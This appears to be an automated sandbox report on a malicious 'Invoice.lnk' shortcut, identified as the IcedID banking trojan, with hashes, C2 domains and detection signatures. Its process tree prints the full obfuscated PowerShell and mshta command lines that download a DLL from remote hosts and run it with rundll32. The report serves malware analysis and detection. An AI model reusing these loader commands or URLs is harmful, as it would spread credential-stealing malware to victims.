Analysis

  • max time kernel
    44s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    06-07-2022 18:13

General

  • Target

    Invoice.lnk

  • Size

    178KB

  • MD5

    c29d6fc092698aafe01ece64da57254f

  • SHA1

    523e8303f8d6853ef499b742ef5e9d7485803a88

  • SHA256

    d94a96230551df45ea50a618f4ef47ab5f2cceaa612da2acdbd05a34b3e32cae

  • SHA512

    fa37a95c3eb1256bea25cc19f84de5de77f24a38938e062a08fab2073a8cc9ca480fa58fc90103f0e298958605866b1ec192971099dcaca4966bd134ac243e50

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://comradespoon.com/5h.hta

Extracted

Family

icedid

Campaign

1487191074

C2

vneastruzz.com

Signatures

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • suricata: ET MALWARE Win32/IcedID Request Cookie

    suricata: ET MALWARE Win32/IcedID Request Cookie

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Invoice.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1748
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $OIdEhQrv = [convert]::FromBase64String('PjIv');$FByAlEjZ = [convert]::FromBase64String('GgQfAxZXHwMDB01YWBQYGgUWExIEBxgYGVkUGBpYQh9ZHwMW');$yZlUjspn = -join($OIdEhQrv | % {[char] ($_ -bxor 0x77)});$lMhAVEem = -join ($FByAlEjZ | % { [char] ($_ -bxor 0x77)});sal UFRBSlOH $yZlUjspn;UFRBSlOH $lMhAVEem
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1508
      • C:\Windows\system32\mshta.exe
        "C:\Windows\system32\mshta.exe" http://comradespoon.com/5h.hta
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1488
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function lpasD($HADYWKdP, $JQNbwy){[IO.File]::WriteAllBytes($HADYWKdP, $JQNbwy)};function UrOfCPrL($HADYWKdP){if($HADYWKdP.EndsWith((qQtFjAStmmZUquwlKa @(65433,65487,65495,65495))) -eq $True){Start-Process (qQtFjAStmmZUquwlKa @(rundll32.exe $HADYWKdP ,PluginInit ))}elseif($HADYWKdP.EndsWith((qQtFjAStmmZUquwlKa @(65433,65499,65502,65436))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $HADYWKdP}else{Start-Process $HADYWKdP}};function iaeLEXNRYglRNM($lpasD){$ssPVUzIfuhNMPpFbC=(qQtFjAStmmZUquwlKa @(65459,65492,65487,65487,65488,65497));$uAbUQLrXxwt=(Get-ChildItem $lpasD -Force);$uAbUQLrXxwt.Attributes=$uAbUQLrXxwt.Attributes -bor ([IO.FileAttributes]$ssPVUzIfuhNMPpFbC).value__};function BRrXupXAZjXJXcLwJn($fRadwPdaCcH){$ZudUcOaTTWDij = New-Object (qQtFjAStmmZUquwlKa @(65465,65488,65503,65433,65474,65488,65485,65454,65495,65492,65488,65497,65503));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$JQNbwy = $ZudUcOaTTWDij.DownloadData($fRadwPdaCcH);return $JQNbwy};function qQtFjAStmmZUquwlKa($aiWdOwItl){$JGtzYUbtTnusApt=65387;$ouOlcqQbirCOt=$Null;foreach($ALFUNolW in $aiWdOwItl){$ouOlcqQbirCOt+=[char]($ALFUNolW-$JGtzYUbtTnusApt)};return $ouOlcqQbirCOt};function bdpFrZCPoqatcoUiW(){$QuseLIVGitH = $env:ProgramData + '\';$LbGea = $QuseLIVGitH + '1.dll'; if (Test-Path -Path $LbGea){UrOfCPrL $LbGea;}Else{ $oGMWxNZW = BRrXupXAZjXJXcLwJn (qQtFjAStmmZUquwlKa @(65491,65503,65503,65499,65445,65434,65434,65486,65498,65496,65501,65484,65487,65488,65502,65499,65498,65498,65497,65433,65486,65498,65496,65434,65436,65433,65487,65495,65495));lpasD $LbGea $oGMWxNZW;UrOfCPrL $LbGea;};iaeLEXNRYglRNM $LbGea;;;;;}bdpFrZCPoqatcoUiW;
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1336
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\ProgramData\1.dll PluginInit
            5⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            PID:1012

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\1.dll

    Filesize

    813KB

    MD5

    35999cd6417ae33f264178adb800d560

    SHA1

    74276d57902e683fbcddb313cb34b0f92bcb52df

    SHA256

    1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

    SHA512

    78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d

  • \ProgramData\1.dll

    Filesize

    813KB

    MD5

    35999cd6417ae33f264178adb800d560

    SHA1

    74276d57902e683fbcddb313cb34b0f92bcb52df

    SHA256

    1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

    SHA512

    78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d

  • \ProgramData\1.dll

    Filesize

    813KB

    MD5

    35999cd6417ae33f264178adb800d560

    SHA1

    74276d57902e683fbcddb313cb34b0f92bcb52df

    SHA256

    1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

    SHA512

    78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d

  • \ProgramData\1.dll

    Filesize

    813KB

    MD5

    35999cd6417ae33f264178adb800d560

    SHA1

    74276d57902e683fbcddb313cb34b0f92bcb52df

    SHA256

    1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

    SHA512

    78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d

  • \ProgramData\1.dll

    Filesize

    813KB

    MD5

    35999cd6417ae33f264178adb800d560

    SHA1

    74276d57902e683fbcddb313cb34b0f92bcb52df

    SHA256

    1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

    SHA512

    78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d

  • memory/1012-106-0x0000000000000000-mapping.dmp

  • memory/1012-114-0x0000000180000000-0x0000000180009000-memory.dmp

    Filesize

    36KB

  • memory/1336-102-0x000007FEF3CC0000-0x000007FEF46E3000-memory.dmp

    Filesize

    10.1MB

  • memory/1336-100-0x0000000000000000-mapping.dmp

  • memory/1336-113-0x00000000025DB000-0x00000000025FA000-memory.dmp

    Filesize

    124KB

  • memory/1336-103-0x000007FEF3160000-0x000007FEF3CBD000-memory.dmp

    Filesize

    11.4MB

  • memory/1336-104-0x00000000025D4000-0x00000000025D7000-memory.dmp

    Filesize

    12KB

  • memory/1336-105-0x00000000025DB000-0x00000000025FA000-memory.dmp

    Filesize

    124KB

  • memory/1336-112-0x00000000025D4000-0x00000000025D7000-memory.dmp

    Filesize

    12KB

  • memory/1488-97-0x0000000000000000-mapping.dmp

  • memory/1508-98-0x0000000002744000-0x0000000002747000-memory.dmp

    Filesize

    12KB

  • memory/1508-96-0x000000001B760000-0x000000001BA5F000-memory.dmp

    Filesize

    3.0MB

  • memory/1508-94-0x000007FEF3B00000-0x000007FEF465D000-memory.dmp

    Filesize

    11.4MB

  • memory/1508-95-0x0000000002744000-0x0000000002747000-memory.dmp

    Filesize

    12KB

  • memory/1508-93-0x000007FEF4660000-0x000007FEF5083000-memory.dmp

    Filesize

    10.1MB

  • memory/1508-99-0x000000000274B000-0x000000000276A000-memory.dmp

    Filesize

    124KB

  • memory/1508-88-0x0000000000000000-mapping.dmp

  • memory/1748-54-0x000007FEFC021000-0x000007FEFC023000-memory.dmp

    Filesize

    8KB